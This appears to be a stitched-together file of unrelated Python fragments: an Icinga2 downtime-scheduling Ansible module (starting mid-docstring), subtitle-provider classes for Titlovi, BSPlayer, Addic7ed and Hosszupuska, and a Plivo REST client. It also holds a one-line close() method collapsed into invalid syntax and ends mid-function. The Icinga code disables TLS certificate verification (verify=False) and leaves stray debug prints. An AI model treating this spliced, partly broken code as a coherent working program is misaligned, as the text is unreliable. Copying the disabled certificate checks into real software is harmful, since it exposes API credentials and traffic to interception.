            hosts were processed, a per-host ``result`` mapping of
            status_code/msg.
        """
        res = dict(changed=False, ansible_module_results="none")

        print("hostname : {} ({})".format(self.hostname, type(self.hostname)))
        print("hostnames : {} ({})".format(self.hostnames, type(self.hostnames)))

        if self.hostname and self.hostnames:
            module.fail_json(msg=("Please choose whether to set downtimes for "
                                  "'hostname' or 'hostnames'. "
                                  "Both at the same time is not supported."))

        if len(self.hostnames) != 0:
            res['changed'] = True
            r = dict()
            for h in self.hostnames:
                r[h] = dict()
                if self.__host_exists(h):
                    payload = {
                        'type': self.object_type,
                        'filter': "host.name == \"{}\"".format(h),
                        'author': self.author,
                        'comment': self.comment,
                        'start_time': self.start_time,
                        'end_time': self.end_time,
                        'duration': self.duration,
                        # fix: collapse if/else pair into a single bool()
                        'fixed': bool(self.fixed),
                    }
                    if self.filter_vars:
                        payload.update(filter_vars=self.filter_vars)
                    if self.trigger_name:
                        payload.update(trigger_name=self.trigger_name)
                    # all_services only makes sense on Host downtimes.
                    if self.object_type == 'Host' and self.all_services is True:
                        payload.update(all_services=True)

                    module.log(msg="downtime for: {}".format(h))
                    module.log(msg="payload: {}".format(payload))

                    code, msg = self.__schedule_downtime(payload)
                    module.log(msg="{}: {}".format(code, msg))
                    r[h] = dict(
                        msg=msg,
                        status_code=code,
                    )
                else:
                    module.log(msg="404: host {} is not known".format(h))
                    r[h] = dict(
                        msg="host {} is not known".format(h),
                        status_code=404,
                    )
            res['result'] = r
        elif len(self.hostname) != 0:
            # Single-host mode is not implemented yet.
            pass
        else:
            print("hoo")

        return res

    def __call_url(self, method='GET', path=None, data=None, headers=None):
        """Issue a GET/POST against the Icinga2 API.

        :returns: (status_code, parsed JSON body) tuple.
        :raises ValueError: for an unsupported HTTP method.
        :raises requests.HTTPError: when the response status is an error.
        """
        if headers is None:
            headers = {
                'Accept': 'application/json',
                'X-HTTP-Method-Override': method,
            }

        url = "{0}/{1}".format(self.icinga_url, path)
        print(url)

        self.connection.headers.update(headers)

        try:
            # Fix: the original closed the session BEFORE sending the POST
            # request (and after the GET), and an unsupported method left
            # `ret` unbound, raising NameError at raise_for_status().
            if method == 'GET':
                ret = self.connection.get(url, verify=False)
            elif method == 'POST':
                ret = self.connection.post(url, data=data, verify=False)
            else:
                raise ValueError("unsupported method: {}".format(method))

            self.connection.close()
            ret.raise_for_status()
            return ret.status_code, json.loads(ret.text)
        except Exception as e:
            print(e)
            raise

    def __host_exists(self, hostname):
        """Return True when Icinga2 knows a host named *hostname*."""
        data = {
            "type": "Host",
            "attrs": ["name"],
            "filter": "match(\"{0}\", host.name)".format(hostname),
        }

        code, ret = self.__call_url(
            method='POST',
            path="objects/hosts",
            data=module.jsonify(data),
            headers={
                'Accept': 'application/json',
                'X-HTTP-Method-Override': 'GET'
            })

        results = ret['results']
        if (code == 200 and len(results) != 0):
            attrs = results[0]['attrs']
            if attrs.get('name') == hostname:
                return True
        return False

    def __schedule_downtime(self, data):
        """POST a schedule-downtime action; return (code, status) of the
        first result, or defaults when the API returned nothing."""
        code = 0
        status = "no status available"
        path = 'actions/schedule-downtime'

        code, ret = self.__call_url(
            method='POST',
            path=path,
            data=module.jsonify(data),
            headers={
                'Accept': 'application/json',
                'X-HTTP-Method-Override': 'POST'
            })

        results = ret['results']
        if (len(results) != 0):
            code = int(results[0]['code'])
            status = results[0]['status']
        return code, status
class TitloviProvider(Provider, ProviderSubtitleArchiveMixin):
    """Subtitle provider for titlovi.com (ex-Yugoslav languages)."""
    subtitle_class = TitloviSubtitle
    languages = {Language.fromtitlovi(l) for l in language_converters['titlovi'].codes} | {Language.fromietf('sr-Latn')}
    server_url = 'https://titlovi.com'
    search_url = server_url + '/titlovi/?'
    download_url = server_url + '/download/?type=1&mediaid='

    def initialize(self):
        # Session with a desktop browser User-Agent and site Referer; the
        # site rejects requests without them.
        self.session = Session()
        self.session.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ' \
                                             '(KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'
        logger.debug('User-Agent set to %s', self.session.headers['User-Agent'])
        self.session.headers['Referer'] = self.server_url
        logger.debug('Referer set to %s', self.session.headers['Referer'])

    def terminate(self):
        # Release the HTTP session created in initialize().
        self.session.close()

    def query(self, languages, title, season=None, episode=None, year=None, video=None):
        """Search the site, walking result pages until exhausted.

        :returns: list of TitloviSubtitle objects (possibly empty).
        """
        items_per_page = 10
        current_page = 1

        used_languages = languages
        lang_strings = [str(lang) for lang in used_languages]

        # handle possible duplicate use of Serbian Latin
        if "sr" in lang_strings and "sr-Latn" in lang_strings:
            logger.info('Duplicate entries <Language [sr]> and <Language [sr-Latn]> found, filtering languages')
            used_languages = filter(lambda l: l != Language.fromietf('sr-Latn'), used_languages)
            logger.info('Filtered language list %r', used_languages)

        # convert list of languages into search string
        langs = '|'.join(map(str, [l.titlovi for l in used_languages]))

        # set query params
        params = {'prijevod': title, 'jezik': langs}
        is_episode = False
        if season and episode:
            is_episode = True
            params['s'] = season
            params['e'] = episode
        if year:
            params['g'] = year

        # loop through paginated results
        logger.info('Searching subtitles %r', params)
        subtitles = []

        while True:
            # query the server
            try:
                r = self.session.get(self.search_url, params=params, timeout=10)
                r.raise_for_status()

                soup = BeautifulSoup(r.content, 'lxml')

                # number of results
                result_count = int(soup.select_one('.results_count b').string)
            except:
                # NOTE(review): bare except treats any failure (network,
                # parse) as "no results" and ends the pagination loop.
                result_count = None

            # exit if no results
            if not result_count:
                if not subtitles:
                    logger.debug('No subtitles found')
                else:
                    logger.debug("No more subtitles found")
                break

            # number of pages with results
            pages = int(math.ceil(result_count / float(items_per_page)))

            # get current page
            if 'pg' in params:
                current_page = int(params['pg'])

            try:
                sublist = soup.select('section.titlovi > ul.titlovi > li')
                for sub in sublist:
                    # subtitle id
                    sid = sub.find(attrs={'data-id': True}).attrs['data-id']
                    # get download link
                    download_link = self.download_url + sid
                    # title and alternate title
                    match = title_re.search(sub.a.string)
                    if match:
                        _title = match.group('title')
                        alt_title = match.group('altitle')
                    else:
                        continue

                    # page link
                    page_link = self.server_url + sub.a.attrs['href']
                    # subtitle language
                    match = lang_re.search(sub.select_one('.lang').attrs['src'])
                    if match:
                        try:
                            # decode language
                            lang = Language.fromtitlovi(match.group('lang')+match.group('script'))
                        except ValueError:
                            continue

                    # relase year or series start year
                    # NOTE(review): r_year (and fps below) are only assigned
                    # when their regex matches — a non-matching first row
                    # would raise NameError, and later rows may reuse a
                    # stale value from a previous iteration. Confirm site
                    # markup guarantees a match.
                    match = year_re.search(sub.find(attrs={'data-id': True}).parent.i.string)
                    if match:
                        r_year = int(match.group('year'))
                    # fps
                    match = fps_re.search(sub.select_one('.fps').string)
                    if match:
                        fps = match.group('fps')

                    # releases
                    releases = str(sub.select_one('.fps').parent.contents[0].string)

                    # handle movies and series separately
                    if is_episode:
                        # season and episode info
                        sxe = sub.select_one('.s0xe0y').string
                        r_season = None
                        r_episode = None
                        if sxe:
                            match = season_re.search(sxe)
                            if match:
                                r_season = int(match.group('season'))
                            match = episode_re.search(sxe)
                            if match:
                                r_episode = int(match.group('episode'))

                        subtitle = self.subtitle_class(lang, page_link, download_link, sid, releases, _title,
                                                       alt_title=alt_title, season=r_season, episode=r_episode,
                                                       year=r_year, fps=fps,
                                                       asked_for_release_group=video.release_group,
                                                       asked_for_episode=episode)
                    else:
                        subtitle = self.subtitle_class(lang, page_link, download_link, sid, releases, _title,
                                                       alt_title=alt_title, year=r_year, fps=fps,
                                                       asked_for_release_group=video.release_group)
                    logger.debug('Found subtitle %r', subtitle)

                    # prime our matches so we can use the values later
                    subtitle.get_matches(video)

                    # add found subtitles
                    subtitles.append(subtitle)
            finally:
                soup.decompose()

            # stop on last page
            if current_page >= pages:
                break

            # increment current page
            params['pg'] = current_page + 1
            logger.debug('Getting page %d', params['pg'])

        return subtitles

    def list_subtitles(self, video, languages):
        # Episodes search by series name + S/E; movies by title only.
        season = episode = None
        if isinstance(video, Episode):
            title = video.series
            season = video.season
            episode = video.episode
        else:
            title = video.title

        return [s for s in
                self.query(languages, fix_inconsistent_naming(title), season=season,
                           episode=episode, year=video.year, video=video)]

    def download_subtitle(self, subtitle):
        """Download subtitle content, extracting from rar/zip if packed."""
        r = self.session.get(subtitle.download_link, timeout=10)
        r.raise_for_status()

        # open the archive
        archive_stream = io.BytesIO(r.content)
        if is_rarfile(archive_stream):
            logger.debug('Archive identified as rar')
            archive = RarFile(archive_stream)
        elif is_zipfile(archive_stream):
            logger.debug('Archive identified as zip')
            archive = ZipFile(archive_stream)
        else:
            # Not an archive: accept raw content only if it parses as a
            # valid subtitle; otherwise report an unknown archive type.
            subtitle.content = r.content
            if subtitle.is_valid():
                return
            subtitle.content = None

            raise ProviderError('Unidentified archive type')

        subs_in_archive = archive.namelist()

        # if Serbian lat and cyr versions are packed together, try to find right version
        if len(subs_in_archive) > 1 and (subtitle.language == 'sr' or subtitle.language == 'sr-Cyrl'):
            self.get_subtitle_from_bundled_archive(subtitle, subs_in_archive, archive)
        else:
            # use default method for everything else
            subtitle.content = self.get_subtitle_from_archive(subtitle, archive)

    def get_subtitle_from_bundled_archive(self, subtitle, subs_in_archive, archive):
        """Pick the Latin or Cyrillic member of a mixed-script archive,
        based on '.cyr'/'.cir' filename markers, and store its content."""
        sr_lat_subs = []
        sr_cyr_subs = []
        sub_to_extract = None

        for sub_name in subs_in_archive:
            if not ('.cyr' in sub_name or '.cir' in sub_name):
                sr_lat_subs.append(sub_name)

            if ('.cyr' in sub_name or '.cir' in sub_name) and not '.lat' in sub_name:
                sr_cyr_subs.append(sub_name)

        if subtitle.language == 'sr':
            if len(sr_lat_subs) > 0:
                sub_to_extract = sr_lat_subs[0]

        if subtitle.language == 'sr-Cyrl':
            if len(sr_cyr_subs) > 0:
                sub_to_extract = sr_cyr_subs[0]

        logger.info(u'Using %s from the archive', sub_to_extract)
        subtitle.content = fix_line_ending(archive.read(sub_to_extract))
class BSPlayerProvider(Provider):
    """BSPlayer Provider.

    Talks SOAP/XML to the bsplayer-subtitles.com API: logs in anonymously,
    searches by movie hash/size, and downloads gzipped subtitle payloads.
    """
    languages = {Language('por', 'BR')} | {
        Language(l) for l in [
            'ara', 'bul', 'ces', 'dan', 'deu', 'ell', 'eng', 'fin', 'fra',
            'hun', 'ita', 'jpn', 'kor', 'nld', 'pol', 'por', 'ron', 'rus',
            'spa', 'swe', 'tur', 'ukr', 'zho'
        ]
    }
    SEARCH_THROTTLE = 8
    hash_verifiable = True

    # blatantly based on kodi's bsplayer plugin
    # also took from BSPlayer-Subtitles-Downloader
    def __init__(self):
        self.initialize()

    def initialize(self):
        # Fresh session against a randomly chosen API sub-domain.
        self.session = Session()
        self.search_url = self.get_sub_domain()
        self.token = None
        self.login()

    def terminate(self):
        # Fix: the original closed the session FIRST and then called
        # logout(), which sends its SOAP request through that same session.
        # Log out while the session is still usable, then close it.
        self.logout()
        self.session.close()

    def api_request(self, func_name='logIn', params='', tries=5):
        """POST a SOAP envelope to the API and return the parsed XML root.

        Retries up to *tries* times; a failing login also rotates to a new
        API sub-domain.

        :raises Exception: when all attempts fail.
        """
        headers = {
            'User-Agent': 'BSPlayer/2.x (1022.12360)',
            'Content-Type': 'text/xml; charset=utf-8',
            'Connection': 'close',
            'SOAPAction': '"http://api.bsplayer-subtitles.com/v1.php#{func_name}"'.format(
                func_name=func_name)
        }
        data = (
            '<?xml version="1.0" encoding="UTF-8"?>\n'
            '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
            'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" '
            'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
            'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns1="{search_url}">'
            '<SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
            '<ns1:{func_name}>{params}</ns1:{func_name}></SOAP-ENV:Body></SOAP-ENV:Envelope>'
        ).format(search_url=self.search_url, func_name=func_name, params=params)

        logger.info('Sending request: %s.' % func_name)
        # Fix: `for i in iter(range(tries))` — redundant iter() and unused
        # loop variable.
        for _ in range(tries):
            try:
                self.session.headers.update(headers.items())
                res = self.session.post(self.search_url, data)
                return ElementTree.fromstring(res.text)
            except Exception as ex:
                logger.info("ERROR: %s." % ex)
                if func_name == 'logIn':
                    self.search_url = self.get_sub_domain()
                sleep(1)
        logger.info('ERROR: Too many tries (%d)...' % tries)
        raise Exception('Too many tries...')

    def login(self):
        """Anonymous login; caches the session token. Returns True on success."""
        # If already logged in
        if self.token:
            return True

        root = self.api_request(
            func_name='logIn',
            params=('<username></username>'
                    '<password></password>'
                    '<AppID>BSPlayer v2.67</AppID>'))
        res = root.find('.//return')

        if res.find('status').text == 'OK':
            self.token = res.find('data').text
            logger.info("Logged In Successfully.")
            return True
        return False

    def logout(self):
        """Invalidate the cached token server-side. Returns True on success."""
        # If already logged out / not logged in
        if not self.token:
            return True

        root = self.api_request(
            func_name='logOut',
            params='<handle>{token}</handle>'.format(token=self.token))
        res = root.find('.//return')
        self.token = None

        if res.find('status').text == 'OK':
            logger.info("Logged Out Successfully.")
            return True
        return False

    def query(self, video, video_hash, language):
        """Search subtitles by movie hash/size (+ optional IMDB id)."""
        if not self.login():
            return []

        # Fix: the original only assigned language_ids inside the
        # isinstance branch, so a single Language raised NameError below.
        if isinstance(language, (tuple, list, set)):
            language_ids = ','.join(sorted(l.opensubtitles for l in language))
        else:
            language_ids = language.opensubtitles

        if video.imdb_id is None:
            imdbId = '*'
        else:
            imdbId = video.imdb_id
        sleep(self.SEARCH_THROTTLE)
        root = self.api_request(
            func_name='searchSubtitles',
            params=('<handle>{token}</handle>'
                    '<movieHash>{movie_hash}</movieHash>'
                    '<movieSize>{movie_size}</movieSize>'
                    '<languageId>{language_ids}</languageId>'
                    '<imdbId>{imdbId}</imdbId>').format(
                token=self.token, movie_hash=video_hash,
                movie_size=video.size, language_ids=language_ids,
                imdbId=imdbId))
        res = root.find('.//return/result')

        if res.find('status').text != 'OK':
            return []

        items = root.findall('.//return/data/item')
        subtitles = []
        if items:
            logger.info("Subtitles Found.")
            for item in items:
                subID = item.find('subID').text
                subDownloadLink = item.find('subDownloadLink').text
                subLang = Language.fromopensubtitles(item.find('subLang').text)
                subName = item.find('subName').text
                subFormat = item.find('subFormat').text
                subtitles.append(
                    BSPlayerSubtitle(subLang, subName, subFormat, video,
                                     subDownloadLink))
        return subtitles

    def list_subtitles(self, video, languages):
        return self.query(video, video.hashes['bsplayer'], languages)

    def get_sub_domain(self):
        """Pick a random API endpoint (the service load-balances manually)."""
        # s1-9, s101-109
        SUB_DOMAINS = [
            's1', 's2', 's3', 's4', 's5', 's6', 's7', 's8', 's9',
            's101', 's102', 's103', 's104', 's105', 's106', 's107', 's108',
            's109'
        ]
        API_URL_TEMPLATE = "http://{sub_domain}.api.bsplayer-subtitles.com/v1.php"
        sub_domains_end = len(SUB_DOMAINS) - 1
        return API_URL_TEMPLATE.format(
            sub_domain=SUB_DOMAINS[random.randint(0, sub_domains_end)])

    def download_subtitle(self, subtitle):
        """Download and gunzip the subtitle payload into subtitle.content.

        :raises ValueError: on server error or connection problems.
        """
        session = Session()
        session.headers.update({'User-Agent': 'Mozilla/4.0 (compatible; Synapse)'})
        # Fix: the throwaway session was never closed (connection leak);
        # ensure cleanup on every exit path.
        try:
            res = session.get(subtitle.page_link)
            if res:
                if res.text == '500':
                    raise ValueError('Error 500 on server')

                with gzip.GzipFile(fileobj=io.BytesIO(res.content)) as gf:
                    subtitle.content = gf.read()
                    subtitle.normalize()

                return subtitle
            raise ValueError('Problems conecting to the server')
        finally:
            session.close()
def close(self): requestsSession.close(self) if self.ownPool: self.pool.stop()
class BaseClient(object):
    """The Plivo API client. Deals with all the API requests to be made."""

    def __init__(self, auth_id=None, auth_token=None, proxies=None, timeout=5):
        """Create the client with two sessions: one for JSON requests and
        one for multipart (file upload) requests.

        :param auth_id: Plivo auth ID (resolved via fetch_credentials).
        :param auth_token: Plivo auth token (resolved via fetch_credentials).
        :param proxies: optional requests-style proxies mapping.
        :param timeout: per-request timeout in seconds.
        """
        self.base_uri = PLIVO_API_BASE_URI

        # JSON API session
        self.session = Session()
        self.session.headers.update({
            'User-Agent': get_user_agent(),
            'Content-Type': 'application/json',
            'Accept': 'application/json',
        })
        self.session.auth = fetch_credentials(auth_id, auth_token)

        # Separate session for multipart uploads (no JSON content type)
        self.multipart_session = Session()
        self.multipart_session.headers.update({
            'User-Agent': get_user_agent(),
            'Cache-Control': 'no-cache',
        })
        self.multipart_session.auth = fetch_credentials(auth_id, auth_token)

        self.proxies = proxies
        self.timeout = timeout

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Release pooled connections of both sessions.
        self.session.close()
        self.multipart_session.close()

    def process_response(self, method, response, response_type=None,
                         objects_type=None):
        """Processes the API response based on the status codes and method
        used to access the API.

        Maps 4xx/5xx status codes to the corresponding exception type and
        returns the (optionally wrapped) parsed JSON body otherwise.
        """
        try:
            response_json = response.json(
                object_hook=lambda x: ResponseObject(x)
                if isinstance(x, dict) else x)
            if response_type:
                r = response_type(self, response_json.__dict__)
                response_json = r
            if 'objects' in response_json and objects_type:
                response_json.objects = [
                    objects_type(self, obj.__dict__)
                    for obj in response_json.objects
                ]
        except ValueError:
            # Body was not JSON (e.g. an empty 204 response)
            response_json = None

        if response.status_code == 400:
            if response_json and 'error' in response_json:
                raise ValidationError(response_json.error)
            # Bugfix: a space was missing between 'resource' and 'at:',
            # producing the garbled message "...accessing resourceat: ...".
            raise ValidationError(
                'A parameter is missing or is invalid while accessing resource '
                'at: {url}'.format(url=response.url))

        if response.status_code == 401:
            if response_json and 'error' in response_json:
                raise AuthenticationError(response_json.error)
            raise AuthenticationError(
                'Failed to authenticate while accessing resource at: '
                '{url}'.format(url=response.url))

        if response.status_code == 404:
            if response_json and 'error' in response_json:
                raise ResourceNotFoundError(response_json.error)
            raise ResourceNotFoundError(
                'Resource not found at: {url}'.format(url=response.url))

        if response.status_code == 405:
            if response_json and 'error' in response_json:
                raise InvalidRequestError(response_json.error)
            raise InvalidRequestError(
                'HTTP method "{method}" not allowed to access resource at: '
                '{url}'.format(method=method, url=response.url))

        if response.status_code == 500:
            if response_json and 'error' in response_json:
                raise PlivoServerError(response_json.error)
            raise PlivoServerError(
                'A server error occurred while accessing resource at: '
                '{url}'.format(url=response.url))

        if method == 'DELETE':
            # DELETE must answer 204 No Content
            if response.status_code != 204:
                raise PlivoRestError('Resource at {url} could not be '
                                     'deleted'.format(url=response.url))
        elif response.status_code not in [200, 201, 202]:
            raise PlivoRestError(
                'Received status code {status_code} for the HTTP method '
                '"{method}"'.format(status_code=response.status_code,
                                    method=method))

        return response_json

    def create_request(self, method, path=None, data=None):
        """Build and prepare a JSON API request; GET sends data as params."""
        path = path or []
        req = Request(
            method, '/'.join([self.base_uri, self.session.auth[0]] +
                             list([str(p) for p in path])) + '/',
            **({'params': data} if method == 'GET' else {'json': data}))
        return self.session.prepare_request(req)

    def create_multipart_request(self, method, path=None, data=None,
                                 files=None):
        """Build and prepare a multipart request, attaching files when a
        non-empty 'file' entry is present."""
        path = path or []
        data_args = {}
        if method == 'GET':
            data_args['params'] = data
        else:
            data_args['data'] = data
            if files and 'file' in files and files['file'] != '':
                data_args['files'] = files

        req = Request(
            method, '/'.join([self.base_uri, self.multipart_session.auth[0]] +
                             list([str(p) for p in path])) + '/',
            **(data_args))
        return self.multipart_session.prepare_request(req)

    def send_request(self, request, **kwargs):
        """Send a prepared request. kwargs may carry a 'session' override;
        it is removed before forwarding the rest to Session.send."""
        session = kwargs.pop('session', self.session)
        return session.send(
            request, proxies=self.proxies, timeout=self.timeout, **kwargs)

    def request(self, method, path=None, data=None, response_type=None,
                objects_type=None, files=None, **kwargs):
        """High-level entry point: build, send and process an API request,
        routing through the multipart session when files are given."""
        if files is not None:
            req = self.create_multipart_request(method, path, data, files)
            session = self.multipart_session
        else:
            req = self.create_request(method, path, data)
            session = self.session
        kwargs['session'] = session
        res = self.send_request(req, **kwargs)
        return self.process_response(method, res, response_type, objects_type)
class Addic7edProvider(Provider):
    """Provider for addic7ed.com episode subtitles with optional account login."""
    languages = {Language('por', 'BR')} | {Language(l) for l in [
        'ara', 'aze', 'ben', 'bos', 'bul', 'cat', 'ces', 'dan', 'deu', 'ell', 'eng', 'eus', 'fas', 'fin', 'fra', 'glg',
        'heb', 'hrv', 'hun', 'hye', 'ind', 'ita', 'jpn', 'kor', 'mkd', 'msa', 'nld', 'nor', 'pol', 'por', 'ron', 'rus',
        'slk', 'slv', 'spa', 'sqi', 'srp', 'swe', 'tha', 'tur', 'ukr', 'vie', 'zho'
    ]}
    video_types = (Episode,)
    server_url = 'http://www.addic7ed.com/'

    def __init__(self, username=None, password=None):
        # Credentials must be supplied together or not at all.
        if username is not None and password is None or username is None and password is not None:
            raise ConfigurationError('Username and password must be specified')

        self.username = username
        self.password = password
        self.logged_in = False

    def initialize(self):
        self.session = Session()
        # NOTE(review): assigning headers wholesale replaces requests'
        # default headers (Accept, Accept-Encoding...) — confirm intended.
        self.session.headers = {'User-Agent': 'Subliminal/%s' % get_version(__version__)}

        # login
        if self.username is not None and self.password is not None:
            logger.info('Logging in')
            data = {'username': self.username, 'password': self.password, 'Submit': 'Log in'}
            r = self.session.post(self.server_url + 'dologin.php', data, allow_redirects=False, timeout=10)

            # a 302 redirect is the success signal for this login form
            if r.status_code != 302:
                raise AuthenticationError(self.username)

            logger.debug('Logged in')
            self.logged_in = True

    def terminate(self):
        # logout
        if self.logged_in:
            logger.info('Logging out')
            r = self.session.get(self.server_url + 'logout.php', timeout=10)
            r.raise_for_status()
            logger.debug('Logged out')
            self.logged_in = False

        self.session.close()

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME)
    def _get_show_ids(self):
        """Get the ``dict`` of show ids per series by querying the `shows.php` page.

        :return: show id per series, lower case and without quotes.
        :rtype: dict
        """
        # get the show page
        logger.info('Getting show ids')
        r = self.session.get(self.server_url + 'shows.php', timeout=10)
        r.raise_for_status()
        soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])

        # populate the show ids
        show_ids = {}
        for show in soup.select('td.version > h3 > a[href^="/show/"]'):
            # href is '/show/<id>' — strip the 6-char prefix to get the id
            show_ids[sanitize_string(show.text).lower()] = int(show['href'][6:])
        logger.debug('Found %d show ids', len(show_ids))

        return show_ids

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME)
    def _search_show_id(self, series, year=None):
        """Search the show id from the `series` and `year`.

        :param str series: series of the episode.
        :param year: year of the series, if any.
        :type year: int or None
        :return: the show id, if found.
        :rtype: int or None
        """
        # build the params
        series_year = '%s %d' % (series, year) if year is not None else series
        params = {'search': sanitize_string(series_year, replacement=' '), 'Submit': 'Search'}

        # make the search
        logger.info('Searching show ids with %r', params)
        r = self.session.get(self.server_url + 'search.php', params=params, timeout=10)
        r.raise_for_status()
        soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])

        # get the suggestion
        suggestion = soup.select('span.titulo > a[href^="/show/"]')
        if not suggestion:
            logger.warning('Show id not found: no suggestion')
            return None
        if not sanitized_string_equal(suggestion[0].i.text, series_year):
            logger.warning('Show id not found: suggestion does not match')
            return None

        show_id = int(suggestion[0]['href'][6:])
        logger.debug('Found show id %d', show_id)

        return show_id

    def get_show_id(self, series, year=None, country_code=None):
        """Get the best matching show id for `series`, `year` and `country_code`.

        First search in the result of :meth:`_get_show_ids` and fallback on a
        search with :meth:`_search_show_id`

        :param str series: series of the episode.
        :param year: year of the series, if any.
        :type year: int or None
        :param country_code: country code of the series, if any.
        :type country_code: str or None
        :return: the show id, if found.
        :rtype: int or None
        """
        series_sanitized = sanitize_string(series).lower()
        show_ids = self._get_show_ids()
        show_id = None

        # attempt with country
        if not show_id and country_code:
            logger.debug('Getting show id with country')
            show_id = show_ids.get('%s %s' % (series_sanitized, country_code.lower()))

        # attempt with year
        if not show_id and year:
            logger.debug('Getting show id with year')
            show_id = show_ids.get('%s %d' % (series_sanitized, year))

        # attempt clean
        if not show_id:
            logger.debug('Getting show id')
            show_id = show_ids.get(series_sanitized)

        # search as last resort
        if not show_id:
            logger.warning('Series not found in show ids')
            show_id = self._search_show_id(series)

        return show_id

    def query(self, series, season, year=None, country=None):
        """List subtitles of a whole season of `series` (filtered later)."""
        # get the show id
        show_id = self.get_show_id(series, year, country)
        if show_id is None:
            logger.error('No show id found for %r (%r)', series, {'year': year, 'country': country})
            return []

        # get the page of the season of the show
        logger.info('Getting the page of show id %d, season %d', show_id, season)
        r = self.session.get(self.server_url + 'show/%d' % show_id, params={'season': season}, timeout=10)
        r.raise_for_status()

        # 304 is not an error status, so raise_for_status above lets it through
        if r.status_code == 304:
            raise TooManyRequests()
        soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])

        # loop over subtitle rows
        match = series_year_re.match(soup.select('#header font')[0].text.strip()[:-10])
        series = match.group('series')
        year = int(match.group('year')) if match.group('year') else None
        subtitles = []
        for row in soup.select('tr.epeven'):
            cells = row('td')

            # ignore incomplete subtitles
            status = cells[5].text
            if status != 'Completed':
                logger.debug('Ignoring subtitle with status %s', status)
                continue

            # read the item
            language = Language.fromaddic7ed(cells[3].text)
            hearing_impaired = bool(cells[6].text)
            page_link = self.server_url + cells[2].a['href'][1:]
            season = int(cells[0].text)
            episode = int(cells[1].text)
            title = cells[2].text
            version = cells[4].text
            download_link = cells[9].a['href'][1:]

            subtitle = Addic7edSubtitle(language, hearing_impaired, page_link, series, season, episode, title, year,
                                        version, download_link)
            logger.debug('Found subtitle %r', subtitle)
            subtitles.append(subtitle)

        return subtitles

    def list_subtitles(self, video, languages):
        """Provider entry point: query the season, then filter by language
        and episode number."""
        return [s for s in self.query(video.series, video.season, video.year)
                if s.language in languages and s.episode == video.episode]

    def download_subtitle(self, subtitle):
        """Download the subtitle content; raises DownloadLimitExceeded when
        the server answers with an HTML page instead of a subtitle file."""
        # download the subtitle
        logger.info('Downloading subtitle %r', subtitle)
        r = self.session.get(self.server_url + subtitle.download_link, headers={'Referer': subtitle.page_link},
                             timeout=10)
        r.raise_for_status()

        # detect download limit exceeded
        if r.headers['Content-Type'] == 'text/html':
            raise DownloadLimitExceeded

        subtitle.content = fix_line_ending(r.content)
class HosszupuskaProvider(Provider, ProviderSubtitleArchiveMixin):
    """Hosszupuska Provider (hosszupuskasub.com, Hungarian/English episode subtitles)."""
    languages = {Language('hun', 'HU')} | {Language(l) for l in [
        'hun', 'eng'
    ]}
    video_types = (Episode,)
    server_url = 'http://hosszupuskasub.com/'
    subtitle_class = HosszupuskaSubtitle
    hearing_impaired_verifiable = False
    multi_result_throttle = 2  # seconds

    def initialize(self):
        self.session = Session()
        self.session.headers = {'User-Agent': os.environ.get("SZ_USER_AGENT", "Sub-Zero/2")}

    def terminate(self):
        self.session.close()

    def get_language(self, text):
        """Map a flag image file name to a Language; None when unknown."""
        if text == '1.gif':
            return Language.fromhosszupuska('hu')
        if text == '2.gif':
            return Language.fromhosszupuska('en')
        return None

    def query(self, series, season, episode, year=None, video=None):
        """Scrape the episode listing page and return matching subtitles.

        :param str series: series title.
        :param int season: season number.
        :param int episode: episode number.
        :param year: release year, unused in the query itself.
        :param video: the Video object (for release-group matching).
        :return: list of HosszupuskaSubtitle.
        """
        # Search for s01e03 instead of s1e3
        seasona = "%02d" % season
        episodea = "%02d" % episode
        series = fix_inconsistent_naming(series)
        seriesa = series.replace(' ', '+').replace('\'', '')

        # get the episode page
        logger.info('Getting the page for episode %s', episode)
        url = self.server_url + "sorozatok.php?cim=" + seriesa + "&evad="+str(seasona) + \
            "&resz="+str(episodea)+"&nyelvtipus=%25&x=24&y=8"
        logger.info('Url %s', url)

        r = self.session.get(url, timeout=10).content

        i = 0
        soup = ParserBeautifulSoup(r, ['lxml'])

        # the subtitle rows live in the tenth table of the page
        table = soup.find_all("table")[9]

        subtitles = []
        # loop over subtitles rows
        for row in table.find_all("tr"):
            i = i + 1
            if "this.style.backgroundImage='url(css/over2.jpg)" in str(row) and i > 5:
                datas = row.find_all("td")

                # Currently subliminal not use these params, but maybe later will come in handy
                # hunagrian_name = re.split('s(\d{1,2})', datas[1].find_all('b')[0].getText())[0]
                # Translator of subtitle
                # sub_translator = datas[3].getText()
                # Posting date of subtitle
                # sub_date = datas[4].getText()

                sub_year = sub_english_name = sub_version = None
                # Handle the case when '(' in subtitle
                # NOTE: raw strings used for the regex patterns below; the
                # original plain strings relied on '\d' being passed through,
                # which is a deprecated invalid escape sequence.
                if datas[1].getText().count('(') == 2:
                    sub_english_name = re.split(r's(\d{1,2})e(\d{1,2})', datas[1].getText())[3]
                if datas[1].getText().count('(') == 3:
                    sub_year = re.findall(r"(?<=\()(\d{4})(?=\))", datas[1].getText().strip())[0]
                    sub_english_name = re.split(r's(\d{1,2})e(\d{1,2})', datas[1].getText().split('(')[0])[0]

                if not sub_english_name:
                    continue

                sub_season = int((re.findall(r's(\d{1,2})', datas[1].find_all('b')[0].getText(), re.VERBOSE)[0])
                                 .lstrip('0'))
                sub_episode = int((re.findall(r'e(\d{1,2})', datas[1].find_all('b')[0].getText(), re.VERBOSE)[0])
                                  .lstrip('0'))

                if sub_season == season and sub_episode == episode:
                    sub_language = self.get_language(datas[2].find_all('img')[0]['src'].split('/')[1])
                    sub_downloadlink = datas[6].find_all('a')[1]['href']
                    sub_id = sub_downloadlink.split('=')[1].split('.')[0]

                    if datas[1].getText().count('(') == 2:
                        sub_version = datas[1].getText().split('(')[1].split(')')[0]
